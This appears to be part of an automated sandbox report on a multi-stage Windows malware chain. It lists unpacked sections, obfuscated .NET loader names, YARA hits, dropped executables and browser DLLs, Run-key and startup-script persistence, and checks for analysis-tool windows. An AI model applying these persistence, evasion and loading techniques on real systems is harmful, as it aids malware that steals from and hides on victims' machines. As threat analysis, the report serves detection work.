                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Fwkdsz.exe, 00000007.00000002.2694689971.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: protobuf-net.pdbSHA256}Lq source: Fwkdsz.exe, 00000007.00000002.2703552750.0000000006A60000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\MSBuild.pdb source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdb source: MSBuild.exe, 00000012.00000002.2960053340.0000000005530000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: protobuf-net.pdb source: Fwkdsz.exe, 00000007.00000002.2703552750.0000000006A60000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: symbols\exe\MSBuild.pdb source: MSBuild.exe, 00000012.00000002.2924990669.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: o.pdb source: MSBuild.exe, 00000012.00000002.2924990669.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: Plofgcjnqfn.pdbx source: MSBuild.exe, 00000012.00000002.2945809571.0000000004043000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2945809571.0000000003D5C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2956645688.00000000051F0000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2942794454.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\dll\System.pdb source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: my_library.pdbU source: 0d8313073f.exe, 0000000D.00000003.2559813189.000000000533B000.00000004.00001000.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2983236159.000000006C191000.00000002.00000001.01000000.0000001A.sdmp, 0d8313073f.exe, 0000000D.00000002.2922718430.000000000063C000.00000040.00000001.01000000.0000000D.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDBs source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\System.pdbC source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2924990669.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.7a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;uqbleicu:EW;hvgssyyw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;uqbleicu:EW;hvgssyyw:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 1.2.skotes.exe.4b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;uqbleicu:EW;hvgssyyw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;uqbleicu:EW;hvgssyyw:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.4b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;uqbleicu:EW;hvgssyyw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;uqbleicu:EW;hvgssyyw:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 6.2.skotes.exe.4b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;uqbleicu:EW;hvgssyyw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;uqbleicu:EW;hvgssyyw:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeUnpacked PE file: 13.2.0d8313073f.exe.610000.0.unpack :EW;.rsrc :W;.idata :W; :EW;onvelaog:EW;dkmdjfdj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;onvelaog:EW;dkmdjfdj:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeUnpacked PE file: 38.2.8a0ff7e068.exe.670000.0.unpack :EW;.rsrc:W;.idata :W;krwtsfss:EW;qssevqjd:EW;.taggant:EW; vs :ER;.rsrc:W;
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeUnpacked PE file: 39.2.33QCBA038D3K2VF7AVBGWF5K.exe.100000.0.unpack :EW;.rsrc:W;.idata :W;krwtsfss:EW;qssevqjd:EW;.taggant:EW; vs :ER;.rsrc:W;
                          Source: 7.2.Fwkdsz.exe.426c600.3.raw.unpack, p048vnIPt6o8p1FM45C.cs.Net Code: Type.GetTypeFromHandle(DfMQSMds9ZsH1vhCRGu.tq8uxXExpS(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(DfMQSMds9ZsH1vhCRGu.tq8uxXExpS(16777252)),Type.GetTypeFromHandle(DfMQSMds9ZsH1vhCRGu.tq8uxXExpS(16777284))})
                          Source: 7.2.Fwkdsz.exe.4072018.1.raw.unpack, MTVxnAMz9gQcFl6SsyU.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: Fwkdsz[1].exe.6.dr, Vnuzxogml.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                          Source: Fwkdsz.exe.6.dr, Vnuzxogml.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                          Source: DiagTrack.exe.7.dr, Vnuzxogml.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                          Source: 7.2.Fwkdsz.exe.46d51f0.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                          Source: 7.2.Fwkdsz.exe.46d51f0.4.raw.unpack, ListDecorator.cs.Net Code: Read
                          Source: 7.2.Fwkdsz.exe.46d51f0.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                          Source: 7.2.Fwkdsz.exe.46d51f0.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                          Source: 7.2.Fwkdsz.exe.46d51f0.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                          Source: 7.2.Fwkdsz.exe.4072018.1.raw.unpack, HelperProxyStruct.cs.Net Code: ByPgCEEMMWKZ27j92D0 System.AppDomain.Load(byte[])
                          Source: 7.2.Fwkdsz.exe.6a60000.9.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                          Source: 7.2.Fwkdsz.exe.6a60000.9.raw.unpack, ListDecorator.cs.Net Code: Read
                          Source: 7.2.Fwkdsz.exe.6a60000.9.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                          Source: 7.2.Fwkdsz.exe.6a60000.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                          Source: 7.2.Fwkdsz.exe.6a60000.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                          Source: Yara matchFile source: 7.2.Fwkdsz.exe.6c60000.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 7.2.Fwkdsz.exe.4568190.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000007.00000002.2705352741.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.2640122155.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.2671334911.0000000004473000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Fwkdsz.exe PID: 1748, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5856, type: MEMORYSTR
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                          Source: random[1].exe.6.drStatic PE information: real checksum: 0x2d7990 should be: 0x2d770b
                          Source: 24da741fb6.exe.6.drStatic PE information: real checksum: 0x2d7990 should be: 0x2d770b
                          Source: Fwkdsz[1].exe.6.drStatic PE information: real checksum: 0x0 should be: 0x396a7
                          Source: 0d8313073f.exe.6.drStatic PE information: real checksum: 0x21ac2b should be: 0x2177b6
                          Source: random[1].exe2.6.drStatic PE information: real checksum: 0x2c0645 should be: 0x2be91c
                          Source: file.exeStatic PE information: real checksum: 0x1dd37c should be: 0x1d3e57
                          Source: skotes.exe.0.drStatic PE information: real checksum: 0x1dd37c should be: 0x1d3e57
                          Source: Fwkdsz.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x396a7
                          Source: random[1].exe0.6.drStatic PE information: real checksum: 0x21ac2b should be: 0x2177b6
                          Source: 8a0ff7e068.exe.6.drStatic PE information: real checksum: 0x2c0645 should be: 0x2be91c
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: uqbleicu
                          Source: file.exeStatic PE information: section name: hvgssyyw
                          Source: file.exeStatic PE information: section name: .taggant
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: uqbleicu
                          Source: skotes.exe.0.drStatic PE information: section name: hvgssyyw
                          Source: skotes.exe.0.drStatic PE information: section name: .taggant
                          Source: random[1].exe.6.drStatic PE information: section name:
                          Source: random[1].exe.6.drStatic PE information: section name: .idata
                          Source: random[1].exe.6.drStatic PE information: section name: zjitwqld
                          Source: random[1].exe.6.drStatic PE information: section name: mduizhsw
                          Source: random[1].exe.6.drStatic PE information: section name: .taggant
                          Source: 24da741fb6.exe.6.drStatic PE information: section name:
                          Source: 24da741fb6.exe.6.drStatic PE information: section name: .idata
                          Source: 24da741fb6.exe.6.drStatic PE information: section name: zjitwqld
                          Source: 24da741fb6.exe.6.drStatic PE information: section name: mduizhsw
                          Source: 24da741fb6.exe.6.drStatic PE information: section name: .taggant
                          Source: random[1].exe0.6.drStatic PE information: section name:
                          Source: random[1].exe0.6.drStatic PE information: section name: .rsrc
                          Source: random[1].exe0.6.drStatic PE information: section name: .idata
                          Source: random[1].exe0.6.drStatic PE information: section name:
                          Source: random[1].exe0.6.drStatic PE information: section name: onvelaog
                          Source: random[1].exe0.6.drStatic PE information: section name: dkmdjfdj
                          Source: random[1].exe0.6.drStatic PE information: section name: .taggant
                          Source: 0d8313073f.exe.6.drStatic PE information: section name:
                          Source: 0d8313073f.exe.6.drStatic PE information: section name: .rsrc
                          Source: 0d8313073f.exe.6.drStatic PE information: section name: .idata
                          Source: 0d8313073f.exe.6.drStatic PE information: section name:
                          Source: 0d8313073f.exe.6.drStatic PE information: section name: onvelaog
                          Source: 0d8313073f.exe.6.drStatic PE information: section name: dkmdjfdj
                          Source: 0d8313073f.exe.6.drStatic PE information: section name: .taggant
                          Source: random[1].exe2.6.drStatic PE information: section name:
                          Source: random[1].exe2.6.drStatic PE information: section name: .idata
                          Source: random[1].exe2.6.drStatic PE information: section name: krwtsfss
                          Source: random[1].exe2.6.drStatic PE information: section name: qssevqjd
                          Source: random[1].exe2.6.drStatic PE information: section name: .taggant
                          Source: 8a0ff7e068.exe.6.drStatic PE information: section name:
                          Source: 8a0ff7e068.exe.6.drStatic PE information: section name: .idata
                          Source: 8a0ff7e068.exe.6.drStatic PE information: section name: krwtsfss
                          Source: 8a0ff7e068.exe.6.drStatic PE information: section name: qssevqjd
                          Source: 8a0ff7e068.exe.6.drStatic PE information: section name: .taggant
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_004CD91C push ecx; ret 6_2_004CD92F
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeCode function: 7_2_074C0A7A push edi; retn 0000h7_2_074C0A7B
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04716348 push eax; ret 8_2_04716351
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_07240FB8 push eax; ret 8_2_072415C1
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeCode function: 11_3_059775DB push ds; ret 11_3_059775E1
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeCode function: 11_3_059775DB push ds; ret 11_3_059775E1
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeCode function: 11_3_059775DB push ds; ret 11_3_059775E1
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeCode function: 11_3_059775DB push ds; ret 11_3_059775E1
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeCode function: 11_3_059775DB push ds; ret 11_3_059775E1
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeCode function: 11_3_059775DB push ds; ret 11_3_059775E1
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeCode function: 11_3_059775DB push ds; ret 11_3_059775E1
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeCode function: 11_3_059775DB push ds; ret 11_3_059775E1
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeCode function: 11_3_059775DB push ds; ret 11_3_059775E1
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeCode function: 11_3_059775DB push ds; ret 11_3_059775E1
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeCode function: 11_3_059775DB push ds; ret 11_3_059775E1
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeCode function: 11_3_059775DB push ds; ret 11_3_059775E1
                          Source: file.exeStatic PE information: section name: entropy: 7.986185819192592
                          Source: file.exeStatic PE information: section name: uqbleicu entropy: 7.9530760325425325
                          Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.986185819192592
                          Source: skotes.exe.0.drStatic PE information: section name: uqbleicu entropy: 7.9530760325425325
                          Source: random[1].exe.6.drStatic PE information: section name: entropy: 7.979452596150149
                          Source: 24da741fb6.exe.6.drStatic PE information: section name: entropy: 7.979452596150149
                          Source: random[1].exe0.6.drStatic PE information: section name: onvelaog entropy: 7.953383530977848
                          Source: 0d8313073f.exe.6.drStatic PE information: section name: onvelaog entropy: 7.953383530977848
                          Source: random[1].exe2.6.drStatic PE information: section name: entropy: 7.754957563736942
                          Source: 8a0ff7e068.exe.6.drStatic PE information: section name: entropy: 7.754957563736942
                          Source: 7.2.Fwkdsz.exe.426c600.3.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'mBExGJwXNXrLEOd9Gm2'
                          Source: 7.2.Fwkdsz.exe.426c600.3.raw.unpack, DfMQSMds9ZsH1vhCRGu.csHigh entropy of concatenated method names: 'tq8uxXExpS', 'lvVuBp6FvP', 'uMUg51gdnfKNertDGNf', 'n6NbY3gfkxYDJ2dyiEp', 'VaeML2giN7UkwUuAk6r', 'rjTup5gLBHnl2NmdVSg', 'm77U1Qgxi6o1kIRSj9I', 'BZnUXBgB76X4mFM2HWZ'
                          Source: 7.2.Fwkdsz.exe.426c600.3.raw.unpack, BQmsVgIRTvn1XiefSFo.csHigh entropy of concatenated method names: 'Nu4ISI36ap', 'gxRIVBI5dX', 'b260PFYPfyoPvj6lc5F', 'amndA3Y6d4EjeqgU2Gx', 'n5kbDBYKgphaIytrXZl', 'xqkjQnYYbtfGM3sTuFQ', 'qAsJShYwKeIBkE9tokQ', 'l2ekbCYgTIwSsREY069', 'xmeQCEY0uQCYuumAoPy'
                          Source: 7.2.Fwkdsz.exe.426c600.3.raw.unpack, Tfk3eGd6Ry1TRDjJbKU.csHigh entropy of concatenated method names: 'SwudWgWiaX', 'owGdJZbYjs', 'GGUd14K91R', 'zQ3dCbjlyh', 'sGpdvZHeWu', 'Qy0dpmGmW7', 'Jtnd5ER496', 'xwedTGysbh', 'IESdnmX9n1', 'jcpd4mxJZB'
                          Source: 7.2.Fwkdsz.exe.426c600.3.raw.unpack, xft5L6M8BqS3vUt6rqB.csHigh entropy of concatenated method names: 'IS4MeTt0QW', 'Qv0MftLCda', 'E5nML5mBAO', 'D9cMBs74N4', 'DchMRFUJly', 'gPhMmgV69N', 'kVDMS8ZmZg', 'W3qMVZAXHd', 'dOUMHvIpbo', 'PNdMZ3YH4W'
                          Source: 7.2.Fwkdsz.exe.426c600.3.raw.unpack, PyNSb8ysCH9Le3dVUZy.csHigh entropy of concatenated method names: 'TWUyGxLxeg', 'U25yA9yrVa', 'NtWyPPDaNi', 'S42y6XYm09', 'cx0yKAnUY5', 'oAkPig6RNcEnClJDGco', 'WbPq2G6mf4BmDOUFQ4u', 'd7iJjG6SB72x50wl4fs', 'KdLWvU6Vfy9nBv8eO4o', 'sKgvKt6Hq3tOEEcCGuk'
                          Source: 7.2.Fwkdsz.exe.426c600.3.raw.unpack, p048vnIPt6o8p1FM45C.csHigh entropy of concatenated method names: 'pISytywwCxoIguGHpbH', 'HiSgvmwgDVRt68ErjNi', 'WfLddaxIqV', 'ExCU7BwOT0mQQOOcX2T', 'nKFFnywutD6NWLiXmeZ', 'lYLHZwwtwqugvQI8IAt', 'G7fD5Nw7eInGWiZiunf', 'bEFid8wWt4yK1NgTTZ4', 'lkiHX9wJlVH5YpXgUTn', 'K0hPHdw1puxuMWkyNq4'
                          Source: 7.2.Fwkdsz.exe.426c600.3.raw.unpack, eUfx0vdzrQYSsk2NCMe.csHigh entropy of concatenated method names: 'GFNm2TAd4Z', 'fxOmh2pZPG', 'R6gm34CiIM', 'iLrmaPi1JB', 'dTumrL0jLK', 'L05mlkY4b6', 'dYhmNKw5bU', 'hdlfqU4DPj', 'nbJmocjIba', 'hpxmsAncre'
                          Source: 7.2.Fwkdsz.exe.4072018.1.raw.unpack, ggiSZxCKb5c75GwVhH.csHigh entropy of concatenated method names: 'WRIMiOyexw', 'ibOMaea39S', 's3EAkNSCFvPvKGyNbJr', 'x77v0aS5ah2LjXTS0lC', 'R12pkcSQJNVuHCvTJRs', 'AaaDJIS9frRHk06fl0b', 'CtEui6SVqfmunlm1QmU', 'oPYMgMlcvO', 'gdCMlhBtEb', 'IAOjxjSGkiwE90atUit'
                          Source: 7.2.Fwkdsz.exe.4072018.1.raw.unpack, x5T8jgHb5xALcUXZvl.csHigh entropy of concatenated method names: 'JG3gHYdxj', 'mm9lDICSk', 'l7v9YxYj8', 'JpWin7EURWqNdGVxE7A', 'VeHG9tEGs9TjuyDPIvU', 'xBH1UhEdKDWBvrJi2yL', 'JtskdKEfMUMP6PqOCNv', 'PFp1F3E3AS15i7fAVqA', 'qrSpLGEpFh5fQ1GRecr', 'pMC3gDE1goLJFd0d6E7'
                          Source: 7.2.Fwkdsz.exe.4072018.1.raw.unpack, HelperProxyStruct.csHigh entropy of concatenated method names: 'SortManager', 'YNtvi7cKk', 'Prk8gvBqu', 'EgAFHpTdC', 'xhHk0mQ9H', 'esBW8fva8', 'Hb0WDsE2Z4dkVT7Z5jk', 'PfL2VPEXMCUEx2KKUWs', 'ByPgCEEMMWKZ27j92D0', 'FASHhMruBrDW7K46Mna'
                          Source: 7.2.Fwkdsz.exe.4072018.1.raw.unpack, EQUseJMhWxJ6dh0s25i.csHigh entropy of concatenated method names: 'Tk66qTojJZ', 'k62WMyqySPRg3v9StFk', 'sNCx5yqNgEsxJayF8eW', 'UNbZsoqRIBYDukNuxso', 'Fn3gncqOaVhebiLZuiX', 'xETv5cqJyh1BGG6umx2', 'ublXC5qw5rtFpWHhXlD'
                          Source: 7.2.Fwkdsz.exe.4072018.1.raw.unpack, MTVxnAMz9gQcFl6SsyU.csHigh entropy of concatenated method names: 'UnMCFoqhRMuwM6PW49T', 'WCgY3WqKYQgmFMmjhsU', 'ID4bloib7X', 'VafSiDA2FxV3eKxcEIP', 'LK2gCoAXKdLWDjgyRDb', 'Au4tGTAM1YYsijNSVrd', 'VLxCuXAjb6NIsisvW2p', 'K3xTDFAbbR1yHOB133T', 'tStctGArVyn8dCLKRH8', 'Sb0lUxAE2bH5LKlTHtm'
                          Source: 7.2.Fwkdsz.exe.4072018.1.raw.unpack, mOZ5d5bYvmaVAIFBnZu.csHigh entropy of concatenated method names: 'jm9rEATMRo', 'QJWr4W2ljs', 'vIkrSgHmHE', 'kbNrqDX7fy', 'bNwrAJ0B5P', 'bpir64VLTm', 'w95rT03k8c', 'l3IrvemV4y', 'Rb9r8MtnCa', 'aWbrFT1dOm'
                          Source: 7.2.Fwkdsz.exe.4072018.1.raw.unpack, imXD3ZciZsGbLPx0Vr.csHigh entropy of concatenated method names: 'zEGP0MRnc', 'muceZaW3T', 'xmgZCr2im', 'BZwsGQuYl', 'O4ntlvaUY', 'YYFmichMg', 'WyVa2eEv6VpKReb8hPL', 'NmHZBNE6dL5dMh98Ra4', 'Vd557CETJhI0Gf89yue', 'EeMYeJE8a2XwVs7LpeC'
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeFile created: C:\Users\user\AppData\Roaming\DiagTrack.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile created: C:\ProgramData\chrome.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile created: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fwkdsz[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile created: C:\ProgramData\chrome.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file

                          Boot Survival

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8a0ff7e068.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 24da741fb6.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0d8313073f.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 203f60e481.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DiagTrack.vbsJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
